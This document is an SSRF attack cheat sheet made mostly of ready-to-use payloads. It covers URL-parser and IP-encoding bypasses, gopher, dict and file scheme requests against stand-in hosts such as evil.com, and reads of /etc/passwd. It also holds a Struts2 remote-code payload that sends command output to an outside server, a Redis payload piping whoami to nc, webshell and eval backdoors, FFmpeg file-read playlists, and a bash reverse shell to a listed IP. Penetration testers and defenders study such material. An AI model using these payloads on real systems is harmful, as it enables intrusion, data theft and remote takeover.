Link to this headingSSRF

SSRF-Bible-Cheatsheet
Free Burp Calab

These Functions will accept remote and local files by default

PHP Functions:

file_get_contents() fsockopen() curl_exec()

Link to this headingURL Parsing

http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
https://127.0.0.1 %0D%0AHELO orange.tw%0D%0AMAIL FROM...:25/
http://127.0.0.1:11211:80/
http://google.com#@evil.com/
http://[email protected]:[email protected]/
http://[email protected] @google.com/
http://127.0.0.1:11211#@google.com:80/
http://[email protected]:[email protected]:80/
http://[email protected] @google.com:11211/

Node JS Failure:
http://orange.tw/sandbox/NN/passwd
http://orange.tw/sandbox/\xFF\x2E\xFF\x2E/passwd

Glibc:
http://127.0.0.1\tfoo.google.com
http://127.0.0.1%09foo.google.com
http://127.0.0.1%2509foo.google.com

Link to this headingURL Schema Support

JAR:

jar:**https://domain.com/path/to/jar.jar**!**/Pictures/a.jpg**

SFTP:

http://safebuff.com/ssrf.php?url=sftp://evil.com:11111/ //Commands evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2

Dict:

http://safebuff.com/ssrf.php?dict://attacker:11111/ //Commands evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0

Gopher:

http://safebuff.com/ssrf.php?url=http://evil.com/gopher.php //Response <?php header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest'); ?> //Commands evil.com:# nc -v -l 12346 Listening on [0.0.0.0] (family 0, port 12346) Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398) HI Multiline test

TFTP:

http://safebuff.com/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET //Commands evil.com:# nc -v -u -l 12346 Listening on [0.0.0.0] (family 0, port 12346) TESTUDPPACKEToctettsize0blksize512timeout6

File:

http://safebuff.com/redirect.php?url=file:///etc/passwd http://safebuff.com/redirect.php?url=file:///proc/self/cwd/../config

Ldap:

http://safebuff.com/redirect.php?url=ldap://localhost:11211/%0astats%0aquit

Link to this headingSVG

SSRF though XLink:

<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="http://EXAMPLE_SERVER/" /></svg>

Link to this headingLocal File Read

http://www.xxx.com/redirect.php?url=file:///etc/passwd http://www.xxx.com/redirect.php?url=file:///C:/Windows/win.ini

Trick with Java:

file:///proc/self/cwd/../condig/

Link to this headingBool SSRF

Struts2-016 POC

?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}

Link to this headingIP Addresses

Source

Zeros are optional:

$ ping 127.1 PING 127.1 (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: icmp\_seq=0 ttl=64 time=0.033 ms 64 bytes from 127.0.0.1: icmp\_seq=1 ttl=64 time=0.085 ms

Overflowing the IP address:

$ ping 10.0.513 PING 10.0.513 (10.0.2.1): 56 data bytes 64 bytes from 10.0.2.1: icmp\_seq=0 ttl=61 time=10.189 ms 64 bytes from 10.0.2.1: icmp\_seq=1 ttl=61 time=58.119 ms

Decimal IP notation:

$ ping 167772673 PING 167772673 (10.0.2.1): 56 data bytes 64 bytes from 10.0.2.1: icmp\_seq=0 ttl=61 time=15.441 ms 64 bytes from 10.0.2.1: icmp\_seq=1 ttl=61 time=4.627 ms

Hex IP notation:

$ ping 0xA000201 PING 0xA000201 (10.0.2.1): 56 data bytes 64 bytes from 10.0.2.1: icmp\_seq=0 ttl=61 time=7.329 ms 64 bytes from 10.0.2.1: icmp\_seq=1 ttl=61 time=18.350 ms $ ping 0x7f.0x00.0x00.0x01 PING 0x7f.0x00.0x00.0x01 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.045 ms $ ping 0x7f.0x010001 PING 0x7f.0x010001 (127.1.0.1) 56(84) bytes of data. 64 bytes from 127.1.0.1: icmp_seq=1 ttl=64 time=0.040 ms 64 bytes from 127.1.0.1: icmp_seq=2 ttl=64 time=0.063 ms

Octal IP notation:

$ ping 10.0.2.010 PING 10.0.2.010 (10.0.2.8): 56 data bytes $ ping 010.002000010 PING 010.002000010 (8.8.0.8) 56(84) bytes of data $ ping 0251.00376.000251.0000376 PING 0251.00376.000251.0000376 (169.254.169.254) 56(84) bytes of data.

Notice how that last .010 octet gets translated to .8?

Octal URL Encoded:

%334%368%366%34%33%375

Mixed Encoding:

$ ping 0251.0xfe.43518 PING 0251.0xfe.43518 (169.254.169.254) 56(84) bytes of data.

IPV6 address mappings:

#http://[::ffff:169.254.169.254]/ #http://[::169.254.169.254]/ >>> ping ::1 PING ::1(::1) 56 data bytes 64 bytes from ::1: icmp_seq=1 ttl=64 time=0.039 ms 64 bytes from ::1: icmp_seq=2 ttl=64 time=0.065 ms >>> ping :: PING ::(::) 56 data bytes

Link to this headingDNS Wildcards

Double URL Encoded to bypass whitelist:

%3A8080%2Fadmin%2Fdelete%3fusername%3dcarlos

DNS Wildcards:

149.254.169.254.xip.io 149.254.169.254.nip.io 149-254-169-254.nip.io 1ynrnhl.xip.io # base36(int('254.169.254.169')) www.owasp.org.1ynrnhl.xip.io/

Link to this heading302 Redirects

Use a 302 redirect to http://169.154.169.254/

Also look at 307

Link to this headingExploiting Services

Link to this headingExploiting Redis through SSRF

https://gitlab.com/gitlab-org/gitlab-foss/issues/41293/designs

A multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec

Link to this headingExample Discuz

Open the website:

http://192.168.80.116/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myvps/webshell.php?logo.jpg[/img] http://192.168.80.116/forum.php?mod=ajax&inajax=yes&action=getthreadtypes

Clear Data:

http://192.168.80.116/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myserver/back.php?logo.jpg[/img]

Backdoor URL:

http://1url92.168.80.116/data/cache/hello.php

Link to this headingSSRF Redis Getshell

Generate serialize:

<?php $a['output']['preg']['search']['plugins'] = '/.*/e'; $a['output']['preg']['replace']['plugins'] = '@eval($_POST['c']);'; $a['rewritestatus']=1; $setting = serialize($a); echo $setting."\n".strlen($setting); ?>

Output:

a:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";a:1:{s:7:"plugins";s:5:"/.*/e";}s:7:"replace";a:1:{s:7:"plugins";s:19:"@eval($_POST["c"]);";}}}s:13:"rewritestatus";i:1;} 173

Link to this headingFFmpeg

cat test.jpg

#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://example.org/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST

subfile

#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://localhost/header.m3u8|subfile,,start,0,end,64,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,64,end,128,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,128,end,256,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,256,end,512,,:///etc/passwd #EXT-X-ENDLIST

Link to this headingPostgreSQL

Exploit

> SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\nstats\n\​' password=1 port=11211 sslmode=disable','select version();');

Link to this headingMongoDB

Exploit:

> db.copyDatabase("\1\2\3\4\5\6\7",'test','localhost:8000') > nc -l 8000 | hexdump -C > db.copyDatabase(“\nstats\nquit”,’test’,’localhost:11211’)

Link to this headingCouchDB

exploit

http://localhost:5984/_users/_all_docs
HTTP/1.1 200 OK Server: CouchDB/1.2.0 (Erlang OTP/R15B01) ETag: "BD1WV12007V05JTG4X6YHIHCA" Date: Tue, 18 Dec 2012 21:39:59 GMT Content-Type: text/plain; charset=utf-8 Cache-Control: must-revalidate {"total_rows":1,"offset":0,"rows":[ {"id":"_design/_auth","key":"_design/_auth","value":{"rev":"1-a8cfb993654bcc635f126724d39eb930"}} ]}

Attacker could also send requests from CouchDB server to intranet by using replication function

POST http://couchdb:5984/_replicate Content-Type: application/json Accept: application/json { "source" : "recipes", "target" : "http://ssrf-me:11211/recipes", }

Link to this headingJboss

Jboss POC

/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://our_public_internet_server/utils/cmd.war

shell

http://target.com/ueditor/jsp/getRemoteImage.jsp POST: upfile=http://10.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOp%26name=jboss.system%3Aservice%3DMainDeployer%26methodIndex=3%26arg0=http%3A%2F%2F远端地址%2Fhtml5.war%23.jpg
http://target.com/ueditor/jsp/getRemoteImage.jsp POST: upfile=http://内网IP:8080/html5/023.jsp%23.jpg

Reverse shell:

bash -i >& /dev/tcp/123.45.67.89/9999 0>&1

Link to this headingWeblogic

gopher.php

<?php header("Location:gopher://vps-ip:2333/_test"); ?>

vuln website

https://example.com/uddiexplorer/SearchPublicRegistries.jsp POST: operator=http://vps-ip/gopher.php&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

vps

> nc -lvv 2333 Connection from xx.xx.xx.xx port 2333 [tcp/snapp] accepted